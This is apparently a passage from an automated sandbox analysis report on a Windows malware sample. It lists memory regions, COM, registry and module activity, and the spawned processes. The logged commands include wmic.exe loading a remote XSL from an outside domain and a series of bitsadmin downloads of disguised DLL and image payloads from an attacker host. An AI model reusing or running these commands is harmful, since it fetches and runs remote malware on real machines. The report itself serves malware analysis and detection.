apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffd7000	0x7ffd7000	0x7ffd7fff	Private Memory	rw	-
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	rw	-
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	rw	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 38 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

COM (19)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	WBEMLocator	IWbemLocator	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	F6D90F12-9C73-11D3-B32E-00C04F990BB4	2933BF95-7B36-11D2-B20E-00C04F983E60	cls_context = CLSCTX_INPROC_SERVER	2	Fn
Create	8D1C559D-84F0-4BB3-A7D5-56A7435A9BA6	BFBF883A-CAD7-11D3-A11B-00105A1F515A	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	EB87E1BD-3233-11D2-AEC9-00C04FB68820	EB87E1BC-3233-11D2-AEC9-00C04FB68820	cls_context = CLSCTX_INPROC_SERVER	2	Fn
Create	2933BF94-7B36-11D2-B20E-00C04F983E60	2933BF93-7B36-11D2-B20E-00C04F983E60	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Create	F6D90F12-9C73-11D3-B32E-00C04F990BB4	2933BF95-7B36-11D2-B20E-00C04F983E60	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Create	00000323-0000-0000-C000-000000000046	00000146-0000-0000-C000-000000000046	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	6C736DB1-BD94-11D0-8A23-00AA00B58E10	6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8	cls_context = CLSCTX_INPROC_SERVER	2	Fn
Create	Scripting.FileSystemObject	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	1	Fn
Create	WScript.Shell	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	2	Fn
Create	Shell.Application	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli\ms_409	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = \\CRH2YWU7\ROOT\CIMV2	1	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = SELECT Kqncmv426, lgiet286a, UUFIKrncm, NumberOfUsers FROM Win32_OperatingSystem	1	Fn

File (1)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Open	STD_OUTPUT_HANDLE	-		1	Fn

Registry (8)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging, data = 48	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory, data = 37	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Log File Max Size, data = 54	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn

Process (1)

»

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\system32\wbem\WMIC.exe	show_window = 1241912		1	Fn

Module (19)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\system32\kernel32.dll	base_address = 0x75370000	1	Fn
Load	ADVAPI32.dll	base_address = 0x76da0000	1	Fn
Load	ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	c:\windows\system32\wbem\wmic.exe	base_address = 0x890000	1	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	2	Fn
Get Filename	-	process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\system32\wbem\WMIC.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegisterTraceGuidsA, address_out = 0x76f2fb7d	2	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegOpenKeyExA, address_out = 0x76db4907	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegQueryValueExA, address_out = 0x76db48ef	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegCloseKey, address_out = 0x76db469d	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoGetObjectContext, address_out = 0x76a6632b	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstance, address_out = 0x76a69d0b	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CLSIDFromProgIDEx, address_out = 0x76a30782	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CLSIDFromProgID, address_out = 0x76a4503c	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoGetClassObject, address_out = 0x76a554ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoTaskMemFree, address_out = 0x76a76f41	1	Fn

System (11)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:30 (UTC)	1	Fn
Get Time	type = Ticks, time = 101416	1	Fn
Get Time	type = Local Time, time = 2018-10-22 03:26:32 (Local Time)	1	Fn
Get Time	type = Ticks, time = 117390	1	Fn
Get Time	type = Ticks, time = 117406	2	Fn
Get Info	type = System Directory, result_out = C:\Windows\system32	2	Fn
Get Info	type = Operating System	2	Fn

Environment (2)

»

Operation	Additional Information	Success	Count	Logfile
Get Environment String	name = JS_PROFILER		2	Fn

Process #6: wmic.exe

70

0

»

Information	Value
ID	#6
File Name	c:\windows\system32\wbem\wmic.exe
Command Line	"C:\Windows\system32\wbem\WMIC.exe" os get XBRSEWYL, freephysicalmemory /format:"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:58, Reason: Child Process
Unmonitor	End Time: 00:04:31, Reason: Terminated by Timeout
Monitor Duration	00:03:33

OS Process Information

»

Information	Value
PID	0xa98
Parent PID	0x9a4 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A9C 0x ABC 0x AC0 0x AC4 0x AC8 0x ACC 0x AD8 0x ADC 0x AE0 0x AE4 0x AE8 0x AEC 0x B70 0x BA4 0x BD4 0x C04 0x C34 0x C64 0x C94 0x CD0 0x D14 0x D70 0x DA0 0x DD0 0x E54 0x E88 0x EBC 0x F08 0x F14 0x F20 0x 508

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000050000	0x00050000	0x00056fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	rw	-
private_0x0000000000070000	0x00070000	0x0007ffff	Private Memory	rw	-
wmic.exe.mui	0x00080000	0x0008ffff	Memory Mapped File	rw	-
private_0x0000000000090000	0x00090000	0x000cffff	Private Memory	rw	-
locale.nls	0x000d0000	0x00136fff	Memory Mapped File	r	-
pagefile_0x0000000000140000	0x00140000	0x00207fff	Pagefile Backed Memory	r	-
private_0x0000000000210000	0x00210000	0x00210fff	Private Memory	rw	-
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	rw	-
private_0x0000000000230000	0x00230000	0x0032ffff	Private Memory	rw	-
pagefile_0x0000000000330000	0x00330000	0x00430fff	Pagefile Backed Memory	r	-
rpcss.dll	0x00440000	0x0049bfff	Memory Mapped File	r	-
pagefile_0x0000000000440000	0x00440000	0x00440fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000450000	0x00450000	0x00450fff	Pagefile Backed Memory	r	-
private_0x0000000000460000	0x00460000	0x004cffff	Private Memory	rw	-
msxml3r.dll	0x00460000	0x00460fff	Memory Mapped File	r	-
private_0x0000000000470000	0x00470000	0x0048ffff	Private Memory	-	-
private_0x0000000000490000	0x00490000	0x004cffff	Private Memory	rw	-
pagefile_0x00000000004d0000	0x004d0000	0x004d1fff	Pagefile Backed Memory	r	-
private_0x00000000004e0000	0x004e0000	0x0051ffff	Private Memory	rw	-
sortdefault.nls	0x00520000	0x007eefff	Memory Mapped File	r	-
private_0x00000000007f0000	0x007f0000	0x0085ffff	Private Memory	rw	-
windowsshell.manifest	0x007f0000	0x007f0fff	Memory Mapped File	r	-
pagefile_0x00000000007f0000	0x007f0000	0x007f0fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000800000	0x00800000	0x00801fff	Pagefile Backed Memory	r	-
index.dat	0x00810000	0x00817fff	Memory Mapped File	rw	-
private_0x0000000000820000	0x00820000	0x0085ffff	Private Memory	rw	-
index.dat	0x00860000	0x0088bfff	Memory Mapped File	rw	-
wmic.exe	0x00890000	0x008f2fff	Memory Mapped File	rwx	-
pagefile_0x0000000000900000	0x00900000	0x014fffff	Pagefile Backed Memory	r	-
private_0x0000000001500000	0x01500000	0x016effff	Private Memory	rw	-
private_0x0000000001500000	0x01500000	0x0160ffff	Private Memory	rw	-
private_0x0000000001500000	0x01500000	0x0159ffff	Private Memory	rw	-
index.dat	0x01500000	0x0150ffff	Memory Mapped File	rw	-
private_0x0000000001510000	0x01510000	0x0154ffff	Private Memory	rw	-
pagefile_0x0000000001550000	0x01550000	0x01550fff	Pagefile Backed Memory	r	-
private_0x0000000001560000	0x01560000	0x0159ffff	Private Memory	rw	-
pagefile_0x00000000015a0000	0x015a0000	0x015bffff	Pagefile Backed Memory	rw	-
wmiutils.dll.mui	0x015a0000	0x015a4fff	Memory Mapped File	rw	-
urlmon.dll.mui	0x015b0000	0x015b7fff	Memory Mapped File	rw	-
pagefile_0x00000000015c0000	0x015c0000	0x015c0fff	Pagefile Backed Memory	r	-
private_0x00000000015d0000	0x015d0000	0x0160ffff	Private Memory	rw	-
rsaenh.dll	0x01610000	0x0164bfff	Memory Mapped File	r	-
pagefile_0x0000000001610000	0x01610000	0x01610fff	Pagefile Backed Memory	rw	-
private_0x0000000001630000	0x01630000	0x0166ffff	Private Memory	rw	-
private_0x00000000016b0000	0x016b0000	0x016effff	Private Memory	rw	-
private_0x00000000016f0000	0x016f0000	0x017fffff	Private Memory	rw	-
kernelbase.dll.mui	0x016f0000	0x017affff	Memory Mapped File	rw	-
private_0x00000000017c0000	0x017c0000	0x017fffff	Private Memory	rw	-
private_0x0000000001800000	0x01800000	0x0196ffff	Private Memory	rw	-
private_0x0000000001800000	0x01800000	0x018dffff	Private Memory	rw	-
private_0x0000000001850000	0x01850000	0x0188ffff	Private Memory	rw	-
private_0x00000000018a0000	0x018a0000	0x018dffff	Private Memory	rw	-
private_0x0000000001930000	0x01930000	0x0196ffff	Private Memory	rw	-
private_0x0000000001970000	0x01970000	0x01d6ffff	Private Memory	rw	-
private_0x0000000001d70000	0x01d70000	0x01e6ffff	Private Memory	rw	-
private_0x0000000001e70000	0x01e70000	0x01feffff	Private Memory	rw	-
pagefile_0x0000000001e70000	0x01e70000	0x01f4efff	Pagefile Backed Memory	r	-
private_0x0000000001fb0000	0x01fb0000	0x01feffff	Private Memory	rw	-
private_0x0000000001ff0000	0x01ff0000	0x021cffff	Private Memory	rw	-
private_0x0000000001ff0000	0x01ff0000	0x0202ffff	Private Memory	rw	-
private_0x0000000002030000	0x02030000	0x0206ffff	Private Memory	rw	-
private_0x0000000002080000	0x02080000	0x020bffff	Private Memory	rw	-
private_0x00000000020d0000	0x020d0000	0x0210ffff	Private Memory	rw	-
private_0x0000000002190000	0x02190000	0x021cffff	Private Memory	rw	-
private_0x00000000021d0000	0x021d0000	0x022cffff	Private Memory	rw	-
private_0x00000000023a0000	0x023a0000	0x023affff	Private Memory	rw	-
private_0x0000000002480000	0x02480000	0x0248ffff	Private Memory	rw	-
private_0x00000000025e0000	0x025e0000	0x025effff	Private Memory	rw	-
msxml3.dll	0x6d350000	0x6d482fff	Memory Mapped File	rwx	-
npmproxy.dll	0x6dfb0000	0x6dfb7fff	Memory Mapped File	rwx	-
netprofm.dll	0x6e0d0000	0x6e129fff	Memory Mapped File	rwx	-
wmiutils.dll	0x6e3e0000	0x6e3f6fff	Memory Mapped File	rwx	-
wbemsvc.dll	0x6e450000	0x6e45efff	Memory Mapped File	rwx	-
wbemprox.dll	0x6e580000	0x6e589fff	Memory Mapped File	rwx	-
ntdsapi.dll	0x6e590000	0x6e5a7fff	Memory Mapped File	rwx	-
fastprox.dll	0x6e5b0000	0x6e645fff	Memory Mapped File	rwx	-
wbemcomn.dll	0x6e780000	0x6e7dbfff	Memory Mapped File	rwx	-
framedynos.dll	0x6f8d0000	0x6f904fff	Memory Mapped File	rwx	-
rasadhlp.dll	0x70020000	0x70025fff	Memory Mapped File	rwx	-
msvcr90.dll	0x70eb0000	0x70f52fff	Memory Mapped File	rwx	-
msoxmlmf.dll	0x71ae0000	0x71aecfff	Memory Mapped File	rwx	-
rasman.dll	0x72880000	0x72894fff	Memory Mapped File	rwx	-
rasapi32.dll	0x728a0000	0x728f1fff	Memory Mapped File	rwx	-
rtutils.dll	0x73080000	0x7308cfff	Memory Mapped File	rwx	-
sensapi.dll	0x73270000	0x73275fff	Memory Mapped File	rwx	-
napinsp.dll	0x73280000	0x7328ffff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
winnsi.dll	0x73d60000	0x73d66fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x73d70000	0x73d8bfff	Memory Mapped File	rwx	-
wtsapi32.dll	0x73e00000	0x73e0cfff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
nlaapi.dll	0x74070000	0x7407ffff	Memory Mapped File	rwx	-
ntmarta.dll	0x74480000	0x744a0fff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
wshtcpip.dll	0x74650000	0x74654fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
dnsapi.dll	0x749c0000	0x74a03fff	Memory Mapped File	rwx	-
mswsock.dll	0x74b00000	0x74b3bfff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
secur32.dll	0x74f80000	0x74f87fff	Memory Mapped File	rwx	-
sspicli.dll	0x74fa0000	0x74fbafff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
profapi.dll	0x75070000	0x7507afff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
ws2_32.dll	0x756c0000	0x756f4fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
normaliz.dll	0x75c60000	0x75c62fff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
nsi.dll	0x76f10000	0x76f15fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
wldap32.dll	0x77070000	0x770b4fff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffd7000	0x7ffd7000	0x7ffd7fff	Private Memory	rw	-
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	rw	-
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	rw	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 37 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

COM (20)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	WBEMLocator	IWbemLocator	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	F6D90F12-9C73-11D3-B32E-00C04F990BB4	2933BF95-7B36-11D2-B20E-00C04F983E60	cls_context = CLSCTX_INPROC_SERVER	2	Fn
Create	6C736DB1-BD94-11D0-8A23-00AA00B58E10	6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8	cls_context = CLSCTX_INPROC_SERVER	2	Fn
Create	Scripting.FileSystemObject	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	3	Fn
Create	WScript.Shell	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	7	Fn
Create	Shell.Application	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli\ms_409	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = \\CRH2YWU7\ROOT\CIMV2	1	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = SELECT XBRSEWYL, FreePhysicalMemory FROM Win32_OperatingSystem	1	Fn

File (1)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Open	STD_OUTPUT_HANDLE	-		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging, data = 48	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory, data = 37	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Log File Max Size, data = 54	1	Fn

Process (17)

»

Operation	Process	Additional Information	Count	Logfile
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhma.jpg.zip?18841737 C:\ProgramData\tempa\marxvxinhhma.jpg	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmb.jpg.zip?607484307 C:\ProgramData\tempa\marxvxinhhmb.jpg	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmc.jpg.zip?105185218 C:\ProgramData\tempa\marxvxinhhmc.jpg	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdwwn.gif.zip?918109560 C:\ProgramData\tempa\marxvxinhhmdwwn.gif	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdx.gif.zip?258277672 C:\ProgramData\tempa\marxvxinhhmdx.gif	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhme.jpg.zip?231938807 C:\ProgramData\tempa\marxvxinhhme.jpg	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmf.jpg.zip?161905089 C:\ProgramData\tempa\marxvxinhhmf.jpg	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmg.gif.zip?491458574 C:\ProgramData\tempa\marxvxinhhmg.gif	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmgx.gif.zip?482400544 C:\ProgramData\tempa\marxvxinhhmgx.gif	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxa.gif.zip?747193115 C:\ProgramData\tempa\marxvxinhhmxa.gif	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxb.gif.zip?93543106 C:\ProgramData\tempa\marxvxinhhmxb.gif	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/r1.log C:\ProgramData\tempa\r1.log	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhm98.dll.zip?714489159 C:\ProgramData\tempa\marxvxinhhm98.dll	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?31092521 C:\ProgramData\tempa\marxvxinhhm64.dll	-	1	Fn
Create	bitsadmin /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?86737238 C:\ProgramData\xxx6000137xx\marxvxinhhm64528113361.dll	-	1	Fn
Create	cmd /k echo %time% && timeout 5 > NUL && exit	-	1	Fn
Create	cmd /k echo %time% && timeout 4000 > NUL && exit	-	1	Fn

Module (7)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\system32\kernel32.dll	base_address = 0x75370000	1	Fn
Get Handle	c:\windows\system32\wbem\wmic.exe	base_address = 0x890000	1	Fn
Get Filename	-	process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\system32\wbem\WMIC.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegisterTraceGuidsA, address_out = 0x76f2fb7d	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegOpenKeyExA, address_out = 0x76db4907	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoTaskMemFree, address_out = 0x76a76f41	1	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:47 (UTC)	1	Fn
Get Time	type = Ticks, time = 117827	1	Fn
Get Time	type = Local Time, time = 2018-10-22 03:26:47 (Local Time)	1	Fn
Get Time	type = Ticks, time = 118701	2	Fn
Get Time	type = Ticks, time = 118716	1	Fn
Get Info	type = System Directory, result_out = C:\Windows\system32	2	Fn
Get Info	type = Operating System	1	Fn

Process #7: bitsadmin.exe

92

4

»

Information	Value
ID	#7
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhma.jpg.zip?18841737 C:\ProgramData\tempa\marxvxinhhma.jpg
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:00, Reason: Child Process
Unmonitor	End Time: 00:01:04, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xaf0
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x AF4 0x B08 0x B0C 0x B10 0x B14

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x000e0000	0x000e0fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	rw	-
pagefile_0x0000000000150000	0x00150000	0x00217fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000220000	0x00220000	0x00220fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000230000	0x00230000	0x00230fff	Pagefile Backed Memory	r	-
private_0x0000000000260000	0x00260000	0x0026ffff	Private Memory	rw	-
rsaenh.dll	0x00270000	0x002abfff	Memory Mapped File	r	-
private_0x0000000000270000	0x00270000	0x002affff	Private Memory	rw	-
private_0x00000000002c0000	0x002c0000	0x003bffff	Private Memory	rw	-
pagefile_0x00000000003c0000	0x003c0000	0x004c0fff	Pagefile Backed Memory	r	-
rpcss.dll	0x004d0000	0x0052bfff	Memory Mapped File	r	-
private_0x00000000004d0000	0x004d0000	0x006effff	Private Memory	rw	-
pagefile_0x00000000004d0000	0x004d0000	0x005aefff	Pagefile Backed Memory	r	-
private_0x00000000005b0000	0x005b0000	0x005effff	Private Memory	rw	-
